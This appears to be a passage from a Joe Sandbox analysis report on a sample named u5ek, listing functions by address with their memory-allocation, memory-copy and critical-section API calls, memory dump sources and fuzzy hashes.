                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SystemTimelstrcpy
                                                                                                                                                                                                                              • String ID: #F@$#F@
                                                                                                                                                                                                                              • API String ID: 62757014-661595268
                                                                                                                                                                                                                              • Opcode ID: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
                                                                                                                                                                                                                              • Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                                • Part of subcall function 6BB8CAB0: EnterCriticalSection.KERNEL32(?), ref: 6BB8CB49
                                                                                                                                                                                                                                • Part of subcall function 6BB8CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BB8CBB6
                                                                                                                                                                                                                              • mozalloc_abort.MOZGLUE(?), ref: 6BB8CAA2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 3517139297-2564639436
                                                                                                                                                                                                                              • Opcode ID: de4ba19956b0b6a03b3dabde3ffd2df43b9c52e01924382baf1bac835e60c8db
                                                                                                                                                                                                                              • Instruction ID: 8346e9abc0afe3794ebf9c25b47036e18ea35a1207fa4f5b8207e6a3a093befe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de4ba19956b0b6a03b3dabde3ffd2df43b9c52e01924382baf1bac835e60c8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 511121B1D00A9893DB01DB68D8110BDB375EF96214F049319DC49AB212FB35E5C5C380
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • realloc.MOZGLUE(?,?), ref: 6BB91A6B
                                                                                                                                                                                                                                • Part of subcall function 6BB91AF0: EnterCriticalSection.KERNEL32(?), ref: 6BB91C36
                                                                                                                                                                                                                              • mozalloc_abort.MOZGLUE(?), ref: 6BB91AE7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 2670432147-2564639436
                                                                                                                                                                                                                              • Opcode ID: 4ca4f2e2f6cdceb6b79ea264308b022c0f9e390c6d75829ce04677391d6e551e
                                                                                                                                                                                                                              • Instruction ID: 82bdcc70cc7e66e5146d5a14841936c4a0413f9ef60501df7b5abbc963fdc9a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca4f2e2f6cdceb6b79ea264308b022c0f9e390c6d75829ce04677391d6e551e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23113631E006ACA3CF049BA8E8114BEB779EF86214F088628DD595B212EB75E9C0C380
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BBF51C8), ref: 6BBD591A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF), ref: 6BBD592B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • MOZ_SKELETON_UI_RESTARTING, xrefs: 6BBD5915
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                              • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                              • API String ID: 297244470-335682676
                                                                                                                                                                                                                              • Opcode ID: 2da40d1af9996111197d879e74cc205c24a8592dc78e06310da1ad1f6a00ac7a
                                                                                                                                                                                                                              • Instruction ID: 05aeab9702695c59f8bd2fa1ea0e8a7e897cffd93e6ecd1ba8decd7bf60a9a22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da40d1af9996111197d879e74cc205c24a8592dc78e06310da1ad1f6a00ac7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE04F30104680BBEB105B6CD9087667FEDDB17775F048544E669936D1C3BEF848C7A5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C,?,?,?,?,?), ref: 6BB7510A
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C,?,?,?,?,?), ref: 6BB75167
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6BB75196
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BB74E9C), ref: 6BB75234
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                              • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                              • Instruction ID: 48777f03f1bdb1afb068c4ac273db64da84ff0be25537b1703db87b86c61f5e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8891CF75A04696CFCB24DF08C490A5ABBA1FF89318B19859CDD685B725D336FC42CBE0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB0918
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB09A6
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE7DC,?,00000000), ref: 6BBB09F3
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE7DC), ref: 6BBB0ACB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                              • Opcode ID: 964c41e383ec08968eb674c04644bdcaa4ed8540caf86416035d13e5e321791e
                                                                                                                                                                                                                              • Instruction ID: 7ae3df2d4761f5aa94f719960962002021663e2620695821c1997e89927f6ee8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 964c41e383ec08968eb674c04644bdcaa4ed8540caf86416035d13e5e321791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99516B32B11A94CFEF189B28D54063D73AAEB82F607544579DD6597780DF3AE802C780
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BBAE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BBD5A47
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BBAE56A,?,|UrlbarCSSSpan), ref: 6BBD5A5C
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBD5A97
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BBD5B9D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$mallocmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2682772760-0
                                                                                                                                                                                                                              • Opcode ID: 2905a1d59b23b9eb595734f3a7f89dd0b982f1cfae0f8206a667a9ccacb84018
                                                                                                                                                                                                                              • Instruction ID: 77e397350e99b76fbe4dbeda59b844cb03066fe470ce00a8c956c99ca1f91b45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2905a1d59b23b9eb595734f3a7f89dd0b982f1cfae0f8206a667a9ccacb84018
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9516D705087909FD700CF28C8C0B1ABBE5FF8A358F04C96EE9899B246D778D945CB66
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4bc6d21a744ad1fd4cd3c91ef8e98640043d9ad0f37a03345a33afef75e4667c
                                                                                                                                                                                                                              • Instruction ID: 3cff2a92c0a3becf640b1adb78cf1f415c51fd93d152cd4e2e672647732162c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc6d21a744ad1fd4cd3c91ef8e98640043d9ad0f37a03345a33afef75e4667c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C51AEB1A00246DFDB04CF28C9D079ABBB1FF48314F598269D9199B381D775E895CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BBD61DD
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BBD622C
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BBD6250
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBD6292
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc$freememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4259248891-0
                                                                                                                                                                                                                              • Opcode ID: 0c2503569f4e06496410b39cd9aa7c4a7c4857a5cf4ac88be72128e651f69265
                                                                                                                                                                                                                              • Instruction ID: 6c883b8ed94f543493c311197f268e43fe43d8ee8427cb5e5fdc2e8ac1fb8d05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c2503569f4e06496410b39cd9aa7c4a7c4857a5cf4ac88be72128e651f69265
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15310571A00A4A8FDB04CF2CD881AAAB3E9FF95304F108579C55AD7251EB39E698CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BBF4
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BC66
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BB8BC96
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB8BCCE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc$freememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4259248891-0
                                                                                                                                                                                                                              • Opcode ID: fc3c2a52c21d569032300b94babbecaf41e71113811ebb750cb30cb8333f055b
                                                                                                                                                                                                                              • Instruction ID: 11b3c35ad58f597035899676cd78eaea6824bfa91527c18daa999cf84e4f2b61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc3c2a52c21d569032300b94babbecaf41e71113811ebb750cb30cb8333f055b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07215071F002458BF7208F3DDC8172EB2E9EB81304F148A38D85AD7391EEB6E5848B61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE744,6BBD7765,00000000,6BBD7765,?,6BB96112), ref: 6BB739AF
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE744,?,6BB96112), ref: 6BB73A34
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE784,6BB96112), ref: 6BB73A4B
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73A5F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                              • Opcode ID: e7d450235bef7ba6f7f004c27fe69914ca219f81d7b9c8adea1ae8e017422e76
                                                                                                                                                                                                                              • Instruction ID: 9d89a75b9e2de37544247e1b76b8e9b4d17e6a1469c0628de4dfe1c3fbd75af7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7d450235bef7ba6f7f004c27fe69914ca219f81d7b9c8adea1ae8e017422e76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 682138326057818FCB349F79D852A3E73E9EB85750724053DD57683780D73AE802C752
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BB8B96F
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6BB8B99A
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BB8B9B0
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BB8B9B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$freemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3313557100-0
                                                                                                                                                                                                                              • Opcode ID: 1d443105ff43bc601ed47607a55ae424abf57e093c5de986441593ffcda1bb7c
                                                                                                                                                                                                                              • Instruction ID: b86ada110f96af5ea1cd80f7228b9316f03456c0b84a6ff5cb20e9eb6f7effed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d443105ff43bc601ed47607a55ae424abf57e093c5de986441593ffcda1bb7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90114CB1A002059FCB14CF69D8808ABB7F9FF98214B14853AE91AD3311E735E9598BA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%